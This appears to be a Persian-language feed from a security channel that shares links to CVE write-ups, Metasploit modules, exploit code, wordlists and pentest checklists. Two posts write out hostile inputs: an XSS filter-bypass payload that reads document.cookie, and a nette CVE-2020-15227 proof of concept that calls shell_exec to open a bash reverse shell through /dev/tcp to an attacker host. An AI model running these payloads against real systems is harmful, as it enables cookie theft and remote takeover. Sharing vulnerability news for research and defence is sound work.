گامهای اولیه در کشف باگ از سورس کد

https://btlr.dev/blog/how-to-find-vulnerabilities-in-code-bad-words


#whitebox
#pentest


@sec_nerd

دور زدن WAF و بلک لیست با پیلود جدید XSS

Payload: alert?.(document?.cookie)


#xss
#bugbounty


@sec_nerd

github


#lol
#fun


@sec_nerd

آسیب پذیریِ خواندن فایل دلخواه در Vmware vCenter نسخه های پیش از 6.5u1

#vmware
#network


@sec_nerd

ماژول متاسپلویت برای آسیب پذیری ssi در sharepoint

CVE-2020-16952

https://github.com/wvu-r7/metasploit-framework/blob/feature/sharepoint/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb


جزییات بیشتر:
https://github.com/rapid7/metasploit-framework/pull/14265

#windows
#sharepoint
#ssi


@sec_nerd

شرق آسیایی ها بعد از اپلیکیشن های مبتنی بر جاوا حالا سراغ فریمورک های php رفتن و اینبار از فریمورک nette آسیب پذیری RCE کشف کردن

CVE-2020-15227 PHP framework nette callback RCE

POC: /nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1


#php
#nette
#rce


@sec_nerd

باگ RCE در Pulse Secure پس از احراز هویت

https://www.gosecure.net/blog/2020/08/26/forget-your-perimeter-rce-in-pulse-connect-secure/

CVE-2020-8218

#rce
#pulse
#network


@sec_nerd

#fun

خیلی هامون اینو تجربه کردیم!

@sec_nerd

توضیحات و اکسپلویت آسیب پذیری اخیر outlook 2019

https://github.com/0neb1n/CVE-2020-16947


#outlook
#windows
#rce


@sec_nerd

توضیحات کامل یک محقق در خصوص آسیب پذیری استک tcp/ip در ویندوز که با نام bad neighbor (همسایه ی بد) شناخته میشود


cve-2020-16898

https://blog.pi3.com.pl/?p=780


کد اکسپلویت:
https://site.pi3.com.pl/exp/p_CVE-2020-16898.py


#windows
#tcpip
#rce


@sec_nerd

اساسیات PE injection

https://blog.sevagas.com/IMG/pdf/code_injection_series_part1.pdf


#PE
#windows
#pentest

@sec_nerd

باگ RCE در اپلیکیشن discord

masatokinugawa.l0.cm/2020/10/discord-desktop-rce.html (日本語)
https://mksben.l0.cm/2020/10/discord-desktop-rce.html (English)
https://youtube.com/watch?v=0f3RrvC-zGI (DEMO)


#discord
#rce

@sec_nerd

ورد لیست برای بروت فورس xxe

https://gist.github.com/honoki/d7035c3ccca1698ec7b541c77b9410cf


#xxe
#pentest

@sec_nerd

رتبه بندی زبانهای برنامه نویسی بر اساس میزان برقی که مصرف میکنند!

https://thenewstack.io/which-programming-languages-use-the-least-electricity/


#programming

@sec_nerd

شرحی بر پردازش های سیستم عامل ویندوز

https://nasbench.medium.com/windows-system-processes-an-overview-for-blue-teams-42fa7a617920


#windows


@sec_nerd

چک لیست نفوذ به وب

https://six2dez.gitbook.io/pentest-book/others/web-checklist


#web
#pentest
#bugbounty


@sec_nerd